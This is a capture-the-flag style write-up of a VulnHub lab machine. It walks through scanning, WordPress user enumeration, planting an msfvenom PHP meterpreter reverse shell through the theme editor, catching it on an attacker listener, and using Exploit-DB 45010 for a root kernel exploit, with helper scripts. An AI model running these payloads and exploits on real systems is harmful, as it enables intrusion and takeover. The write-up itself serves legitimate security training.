[Hands-on Penetration Testing] VulnHub target 1: a first pass through the pentest workflow (detailed steps)


Target machine address

Lab objective: get comfortable with the basic penetration-testing workflow and the tools used at each step

Tools and techniques covered

  • dirb for scanning web paths

  • wfuzz for finding the correct URL parameter name

  • msf for looking up and exploiting vulnerabilities

  • Dropping a PHP file through WordPress and catching a reverse shell

Known information:

The target runs as a VMware virtual machine in NAT mode, on the 192.168.31.0/24 network

Attacking host: Kali Linux

Goal:

  • Get into the system and retrieve the target's flag

1. Host discovery: pick the target

An nmap sweep (the command line works just as well as the GUI) turns up the host 192.168.31.100. In a real engagement the sweep returns many hosts, and you have to collect several kinds of reconnaissance data on each of them separately.


2. Port discovery: find the entry point

# scan the full TCP port range, with version and OS detection
nmap -p 1-65535 -T4 -A -v 192.168.31.100

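The sweep and port scan above, as an added example that is not part of the original post: a small shell script that runs the host discovery the post did by hand, then the same full-port scan on every live host, and parses nmap's grepable output (-oG) so the open-port list can feed the next stage instead of being read off a screenshot. The subnet, the /tmp/recon working directory and the sample -oG lines are assumptions made for this example; the live mode needs nmap on the path.

```shell
#!/bin/sh
# Added example, not from the original post: host discovery on the lab subnet,
# then a full-port scan of each live host, with nmap's grepable output (-oG)
# parsed into a clean "port service version" list for the next stage.
# NET and WORK are assumptions for this lab; change them for your network.

NET="${NET:-192.168.31.0/24}"
WORK="${WORK:-/tmp/recon}"

# Pull the addresses nmap marked "Status: Up" out of grepable ping-sweep output.
live_hosts() {
    awk '/Status: Up/ { print $2 }'
}

# Turn the "Ports: 22/open/tcp//ssh//OpenSSH 7.2p2/, ..." field into one
# "port service version" row per open port. Grepable port entries are
# port/state/proto/owner/service/rpcinfo/version, so closed and filtered
# ports are dropped by checking the state field.
open_ports() {
    awk -F'Ports: ' '/Ports: / {
        sub(/\t.*/, "", $2)                 # drop the "Ignored State:" tail
        n = split($2, entry, ", ")
        for (i = 1; i <= n; i++) {
            split(entry[i], f, "/")
            if (f[2] == "open") printf "%s %s %s\n", f[1], f[5], f[7]
        }
    }'
}

# Stage 1: ping sweep of the subnet (the step the post did in nmap by hand).
discover_hosts() {
    mkdir -p "$WORK"
    nmap -sn -oG "$WORK/hosts.gnmap" "$NET" >/dev/null
    live_hosts < "$WORK/hosts.gnmap"
}

# Stage 2: the post's full-range scan, saved as a file so it can be re-parsed.
scan_ports() {
    nmap -p- -T4 -A -oG "$WORK/$1.gnmap" "$1" >/dev/null
    open_ports < "$WORK/$1.gnmap"
}

# Constructed sample of what -oG writes for this target (not a real capture).
SAMPLE="$(printf 'Host: 192.168.31.100 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.2/, 80/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/, 443/closed/tcp//https///\tIgnored State: closed (65533)')"

if [ "${1:-}" = "live" ]; then
    for h in $(discover_hosts); do
        echo "== $h"
        scan_ports "$h"
    done
else
    printf '%s\n' "$SAMPLE" | open_ports
fi
```

Run it with the argument live to scan for real; with no argument it only parses the embedded sample, which is enough to see the output format the next stage receives.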

3. Web penetration

Of the services found, start with the web service, which is usually the easiest way in.


Approaches when you find a web service:

  • Directory scanning
  • Request-parameter fuzzing
  • Checking for sensitive files such as robots.txt
  • Username and password brute forcing
  • Reading the page source (look for anything usable)

Fuzzing is a common black-box testing technique in security work, and it doubles as a reconnaissance method. It feeds the target large volumes of generated or malformed input to test how robustly and safely the target handles them: a program generates the inputs, sends them to the target system or application, and watches for crashes, errors or unexpected behaviour that point to a flaw.

Applied to reconnaissance, fuzzing is used to probe network services and web applications for weaknesses. Sending varied, unexpected data to a server can surface problems such as buffer overflows, denial-of-service conditions and SQL injection, including bugs that scripted security tests miss, because fuzzing exercises how the target responds to abnormal input rather than only to the input it expects. In this write-up it is used in its simplest form: trying many parameter names and watching for the one response that differs from the rest.

Fuzzing is therefore a useful reconnaissance technique, but it can crash or destabilise the target, so use it carefully and only where you are authorised to test.

dirb scan of the web directories

└─# dirb http://192.168.31.100/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jul  1 00:37:21 2023
URL_BASE: http://192.168.31.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.31.100/ ----
+ http://192.168.31.100/dev (CODE:200|SIZE:131)                                                                                                  
+ http://192.168.31.100/index.php (CODE:200|SIZE:136)                                                                                            
==> DIRECTORY: http://192.168.31.100/javascript/                                                                                                 
+ http://192.168.31.100/server-status (CODE:403|SIZE:279)                                                                                        
==> DIRECTORY: http://192.168.31.100/wordpress/                                                                                                  
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/javascript/ ----
==> DIRECTORY: http://192.168.31.100/javascript/jquery/                                                                                          
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/ ----
+ http://192.168.31.100/wordpress/index.php (CODE:301|SIZE:0)                                                                                    
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/                                                                                         
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/                                                                                       
==> DIRECTORY: http://192.168.31.100/wordpress/wp-includes/                                                                                      
+ http://192.168.31.100/wordpress/xmlrpc.php (CODE:405|SIZE:42)                                                                                  
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/javascript/jquery/ ----
+ http://192.168.31.100/javascript/jquery/jquery (CODE:200|SIZE:284394)                                                                          
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/ ----
+ http://192.168.31.100/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)                                                                           
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/css/                                                                                     
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/images/                                                                                  
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/includes/                                                                                
+ http://192.168.31.100/wordpress/wp-admin/index.php (CODE:302|SIZE:0)                                                                           
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/js/                                                                                      
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/maint/                                                                                   
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/network/                                                                                 
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/user/                                                                                    
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-content/ ----
+ http://192.168.31.100/wordpress/wp-content/index.php (CODE:200|SIZE:0)                                                                         
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/plugins/                                                                               
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/themes/                                                                                
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/uploads/                                                                               
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/network/ ----
+ http://192.168.31.100/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                                   
+ http://192.168.31.100/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)                                                                   
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/user/ ----
+ http://192.168.31.100/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                                      
+ http://192.168.31.100/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)                                                                      
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-content/plugins/ ----
+ http://192.168.31.100/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                                 
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-content/themes/ ----
+ http://192.168.31.100/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)                                                                  
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sat Jul  1 00:38:39 2023
DOWNLOADED: 46120 - FOUND: 15

The content scan shows that the target serves WordPress. Visiting the discovered paths gives two useful ones:

  • http://192.168.31.100/dev (CODE:200|SIZE:131)
  • ==> DIRECTORY: http://192.168.31.100/wordpress/


The /dev page gives a hint: use a fuzzing tool to find the correct parameter name, then pass location.txt as its value to move on to the next step.

Finding the correct URL parameter with wfuzz

What fuzzing is used for, here and elsewhere:

  • Finding URL parameter names
  • SQL injection
  • Password brute forcing
  • WAF bypass

# Request the page with a wordlist of parameter names. Each response is summarised by status code and line/word/char counts; the one result whose numbers differ from all the others is the real parameter.
# Pass 1: collect the response statistics for every candidate
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt  http://192.168.31.100/index.php?FUZZ
# Pass 2: hide the baseline. --hw 12 hides every response with 12 words, the count pass 1 showed for wrong guesses, so only the odd one out remains
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt  --hw 12 http://192.168.31.100/index.php?FUZZ

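The two-pass wfuzz procedure above, redone as an added example (not from the original post) with curl and awk so the mechanism is visible: every candidate is summarised as status/lines/words/chars, the most common word count is taken as the "wrong parameter" baseline automatically (the post read 12 off the first run by eye), and everything else is printed, which is exactly what --hw 12 filters for. The base URL, the wordlist path and the sample results are assumptions made for this example; run it with the argument live to hit the target.

```shell
#!/bin/sh
# Added example, not from the original post: the wfuzz two-pass idea done with
# curl, with the baseline picked automatically instead of read off the first
# run by eye. BASE and WORDLIST are assumptions; the wordlist path is the one
# the post used with wfuzz.

BASE="${BASE:-http://192.168.31.100/index.php}"
WORDLIST="${WORDLIST:-/usr/share/wfuzz/wordlist/general/common.txt}"

# Reads one response body on stdin and prints "lines words chars", the three
# numbers wfuzz reports per request (chars counts one newline per line).
stats() {
    awk '{ lines++; words += NF; chars += length($0) + 1 }
         END { printf "%d %d %d\n", lines, words, chars }'
}

# Requests BASE?<candidate> the way the post did (?FUZZ with no value) and
# prints "candidate status lines words chars".
probe() {
    tmp="$(mktemp)"
    code="$(curl -s -o "$tmp" -w '%{http_code}' "$BASE?$1" </dev/null)"
    printf '%s %s %s\n' "$1" "$code" "$(stats < "$tmp")"
    rm -f "$tmp"
}

# The most common word count across all results is the "wrong parameter"
# response; everything else is worth a look.
baseline_words() {
    awk '{ seen[$4]++ }
         END { for (k in seen) if (seen[k] > best) { best = seen[k]; word = k }
               print word }'
}

# Equivalent of wfuzz --hw N: hide every result whose word count is N.
hide_words() {
    awk -v hw="$1" '$4 != hw'
}

# Constructed results for the demo (not a real capture): three baseline hits
# and one candidate whose response is clearly different.
SAMPLE="$(printf 'id 200 5 12 100\nname 200 5 12 100\nfile 200 9 40 300\npage 200 5 12 100')"

if [ "${1:-}" = "live" ]; then
    out="$(mktemp)"
    while read -r w; do
        [ -n "$w" ] && probe "$w"
    done < "$WORDLIST" > "$out"
    hide_words "$(baseline_words < "$out")" < "$out"
    rm -f "$out"
else
    printf '%s\n' "$SAMPLE" | hide_words "$(printf '%s\n' "$SAMPLE" | baseline_words)"
fi
```

The point of computing the baseline from the results rather than hard-coding 12 is that the right --hw value changes with every target; anything that is not the majority response is a candidate worth opening in a browser.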

The correct parameter is file; follow the hint and request the page with it.


With the parameter known, the next step is to pass a value that leaks system information. file means a filename, so the first thing to try is the system account file /etc/passwd.


The hint leads to the keyword "follow_the_ippsec". What does it relate to? The only known services are SSH and HTTP, and the web application is WordPress. Since the goal is a username and password, look at WordPress for account information.

WordPress exploitation

Getting the WordPress username

Method 1: by experience

A fresh WordPress install publishes a sample post automatically, and the post shows its author, so the WordPress login name is victor.


Trying that username with the keyword as the password logs in successfully:


Next, look for a way to turn WordPress access into a foothold on the underlying system.

Method 2: fingerprinting tools to get WordPress users

Fingerprinting tools for WordPress:

  • wpscan
  • cmseek (a general CMS scanner); install it with:

apt-get update

apt-get install -y cmseek

Enumerating users with wpscan also gives victor


# full output of the wpscan user enumeration

# wpscan --url http://192.168.31.100/wordpress -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.31.100/wordpress/ [192.168.31.100]
[+] Started: Sat Jul  1 01:32:10 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.31.100/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.31.100/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.31.100/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.31.100/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.31.100/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
 |  - http://192.168.31.100/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.2</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.5
 | Style URL: http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <====================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] victor
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Jul  1 01:32:12 2023
[+] Requests Done: 69
[+] Cached Requests: 6
[+] Data Sent: 16.91 KB
[+] Data Received: 20.512 MB
[+] Memory used: 168.305 MB
[+] Elapsed time: 00:00:02
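The "Author Id Brute Forcing" check that wpscan reports above, plus the REST users route that is worth adding as a passive check, as an added example done with curl rather than code from the wpscan project: for an existing user, /?author=N redirects to /author/<login>/ when pretty permalinks are enabled, and /wp-json/wp/v2/users lists every user who has published a post (WordPress 4.7 and later, so it applies to the 5.2.2 found here). The blog URL, the ID range and the sample header/JSON responses are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not from the original post: two of the user-enumeration
# checks wpscan performs, done with curl so you can see what the tool
# actually asks the site. WP (the blog URL) and MAX_ID are assumptions.

WP="${WP:-http://192.168.31.100/wordpress}"
MAX_ID="${MAX_ID:-10}"

# With pretty permalinks on, WordPress answers /?author=N with a redirect to
# /author/<login-slug>/ when user N exists; pull the slug out of raw response
# headers on stdin (the \r of CRLF headers is excluded by [:space:]).
author_slug() {
    sed -n 's#^[Ll]ocation: .*/author/\([^/[:space:]]*\)/.*#\1#p' | head -n 1
}

# The REST API lists users who have published content at
# /wp-json/wp/v2/users; extract the "slug" fields from its JSON.
rest_slugs() {
    grep -o '"slug":"[^"]*"' | cut -d'"' -f4
}

# Aggressive check: walk author IDs 1..MAX_ID, one HEAD request each.
enum_author_ids() {
    i=1
    while [ "$i" -le "$MAX_ID" ]; do
        slug="$(curl -s -I "$WP/?author=$i" | author_slug)"
        [ -n "$slug" ] && printf 'id=%s user=%s\n' "$i" "$slug"
        i=$((i + 1))
    done
}

# Passive check: a single request to the REST endpoint.
enum_rest_users() {
    curl -s "$WP/wp-json/wp/v2/users" | rest_slugs
}

# Constructed responses for the demo (not real captures).
SAMPLE_HEADERS="$(printf 'HTTP/1.1 301 Moved Permanently\r\nLocation: http://192.168.31.100/wordpress/author/victor/\r\nContent-Length: 0\r\n')"
SAMPLE_JSON='[{"id":1,"name":"victor","url":"","description":"","link":"http://192.168.31.100/wordpress/author/victor/","slug":"victor"}]'

if [ "${1:-}" = "live" ]; then
    enum_author_ids
    enum_rest_users
else
    printf '%s\n' "$SAMPLE_HEADERS" | author_slug
    printf '%s\n' "$SAMPLE_JSON" | rest_slugs
fi
```

The slug is the login name, which is what the next step (trying the keyword as the password) needs; the display name shown on the post can differ from it, so confirming through one of these routes is worthwhile before brute forcing anything.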

4. Planting a file and catching a reverse shell

Once logged in, how does the WordPress foothold become system access?

  • Writing a file through WordPress: an administrator can edit the active theme's PHP files in the theme editor (Appearance > Theme Editor). This is a legitimate feature abused with valid credentials rather than an upload vulnerability in the CMS, but the result is the same: PHP of our choosing is served from the web root.


Generate the reverse-shell script:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.31.101 lport=6666 -o shell.php


In WordPress, open the theme editor for the current theme, pick a PHP file you can edit (secret.php in the screenshot), and paste in the PHP generated above.


On Kali, start a handler in msfconsole listening on port 6666 (the same LHOST/LPORT that were baked into the payload):


msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.31.101
lhost => 192.168.31.101
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > exploit

Then request

http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/secret.php (theme files are served from wp-content/themes/<theme>/; this is the standard WordPress directory layout, so the path is worth remembering)


At this point commands can be run on the target; sysinfo in meterpreter shows the system is Ubuntu 16.04.2.


5. Privilege escalation

Next comes privilege escalation, which opens up the rest of the system.

Privilege-escalation approach:

The following shows how to query the local Exploit-DB copy and use a matching exploit to gain root. searchsploit is a stand-alone command that ships with Kali, not an msf module, so run it from a normal shell:

searchsploit 16.04 Ubuntu


Matching the kernel version points to a usable exploit (Exploit-DB 45010, the CVE-2017-16995 eBPF verifier bug). Compile it:

/usr/share/exploitdb/exploits/linux/local/45010.c

then upload it to a writable path on the target where execution is allowed, such as /tmp, and run it to get root.

Compile the exploit on Kali:

cp /usr/share/exploitdb/exploits/linux/local/45010.c /root
cd /root
gcc 45010.c -o 45010   # linked against Kali's newer glibc, this binary fails on the target; see the fix below

In msfconsole (inside the meterpreter session):

  • upload the binary with upload
  • drop to shell and run the 45010 program

Execution fails: ./45010: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./45010)


Fixing the glibc mismatch (the error is about the C library the binary was linked against, not about gcc itself):

Check the target's glibc version through the reverse shell:

ldd --version


On Kali:


apt-get install -y autoconf
git clone https://github.com/NixOS/patchelf.git
cd patchelf
./bootstrap.sh 
./configure
make
make check
sudo make install

PatchELF is a small utility for modifying existing ELF executables and libraries. It can:

  • Change the dynamic loader ("ELF interpreter") of an executable:

    $ patchelf --set-interpreter /lib/my-ld-linux.so.2 my-program
    
  • Change the RPATH of an executable or library:

    $ patchelf --set-rpath /opt/my-libs/lib:/other-libs my-program
    
  • Shrink the RPATH of an executable or library:

    $ patchelf --shrink-rpath my-program
    
    

Fetch a copy of the target's glibc version through the glibc-all-in-one repository, then link the exploit against it:


gcc -Wl,-rpath='/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64',-dynamic-linker='/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-linux-x86-64.so.2' -s  45010.c -o 45010V2

Note what this does: the binary is now linked against glibc 2.23, which satisfies the symbol versions, but the -dynamic-linker and -rpath values are paths on the Kali box and they are stored in the binary (as PT_INTERP and RPATH/RUNPATH). Those paths do not exist on the target, so the kernel cannot find the interpreter and exec fails even though the file is present and executable (the shell reports "No such file or directory" for the binary itself). Linking statically with gcc -static, or building on a machine whose glibc is no newer than the target's, avoids the problem.

Upload it again and run it


The glibc error is gone, so one problem is solved, but now the program hits an execution-permission problem (after an upload, confirm the execute bit with chmod +x before retrying). What a mess!

Using Kali Linux 2021-02-08 instead, the escalation succeeded. That confirms something worth knowing: a new Kali brings new tools, but old exploit code does not always build into something that runs on an old target (here simply because the older Kali has an older glibc), so keeping an older Kali around is worthwhile.
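An added example (not from the original post) that turns the glibc problem above into a check you run before uploading rather than an error you read afterwards: it takes the highest GLIBC_x.y symbol version the built exploit imports (from objdump -T), the target's glibc version (from the ldd --version output obtained through the reverse shell), compares the two, and shows the build that sidesteps the issue entirely, gcc -static, which carries its own libc and has no interpreter path to get wrong. The objdump and ldd samples are constructed to match the versions in this write-up (GLIBC_2.34 required, 2.23 on the target); the live build needs gcc and readelf on Kali.

```shell
#!/bin/sh
# Added example, not from the original post: check a locally built exploit
# against the target's glibc before uploading it, and build it so the check
# cannot fail. The objdump/ldd samples below are constructed, not captured.

# Highest GLIBC_x.y symbol version the binary imports, from `objdump -T binary`.
needed_glibc() {
    grep -o 'GLIBC_[0-9][0-9.]*' | sed 's/^GLIBC_//' |
        sort -t. -k1,1n -k2,2n -k3,3n | tail -n 1
}

# glibc version on the target, from the first line of `ldd --version`,
# which ends with the bare version number.
target_glibc() {
    sed -n '1s/.* \([0-9][0-9.]*\)$/\1/p'
}

# version_le A B: true when dotted version A <= B.
version_le() {
    printf '%s\n%s\n' "$1" "$2" | sort -t. -k1,1n -k2,2n -k3,3n |
        head -n 1 | grep -qxF "$1"
}

# check_compat "<objdump -T output>" "<ldd --version output>"
# Exit status 0 when the binary will load on the target, 1 when it will not.
check_compat() {
    need="$(printf '%s\n' "$1" | needed_glibc)"
    have="$(printf '%s\n' "$2" | target_glibc)"
    if [ -z "$need" ]; then
        echo "ok: no versioned GLIBC imports (static binary)"
    elif version_le "$need" "$have"; then
        echo "ok: needs GLIBC_$need, target has $have"
    else
        echo "incompatible: needs GLIBC_$need, target has $have"
        return 1
    fi
}

# The build that avoids the patchelf / glibc-all-in-one detour: link
# statically, so the binary carries its own libc and has no PT_INTERP
# pointing at a loader path that only exists on Kali.
build_static() {   # $1: source file, $2: output binary
    gcc -static -O2 -o "$2" "$1" &&
        ! readelf -l "$2" | grep -q 'Requesting program interpreter'
}

# Constructed samples matching the versions in this write-up.
OBJDUMP_SAMPLE="$(printf '%s\n' \
  '0000000000000000      DF *UND*  0000000000000000  GLIBC_2.2.5 printf' \
  '0000000000000000      DF *UND*  0000000000000000  GLIBC_2.34  __libc_start_main' \
  '0000000000000000      DF *UND*  0000000000000000  GLIBC_2.2.5 mmap')"
LDD_SAMPLE="$(printf '%s\n' \
  'ldd (Ubuntu GLIBC 2.23-0ubuntu11.3) 2.23' \
  'Copyright (C) 2016 Free Software Foundation, Inc.')"

if [ "${1:-}" = "live" ]; then
    # Usage: sh this.sh live 45010.c
    # Afterwards feed `objdump -T 45010` and the target's `ldd --version`
    # to check_compat; a static build has no versioned imports to check.
    build_static "$2" "${2%.c}" && echo "built ${2%.c} (static, no interpreter)"
else
    check_compat "$OBJDUMP_SAMPLE" "$LDD_SAMPLE" || :   # incompatible: needs GLIBC_2.34, target has 2.23
fi
```

Running the check against the binary from the first gcc attempt reports exactly the 2.34-versus-2.23 gap the error message showed, before any upload; the static build passes trivially because it imports nothing from a shared libc.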


Result of the escalation


In the screenshot the target's IP has changed to 192.168.31.102 because DHCP reassigned it; that does not affect anything.

Targets usually keep the flag in root's home directory, so the root shell obtained by the escalation can read it. Target done!

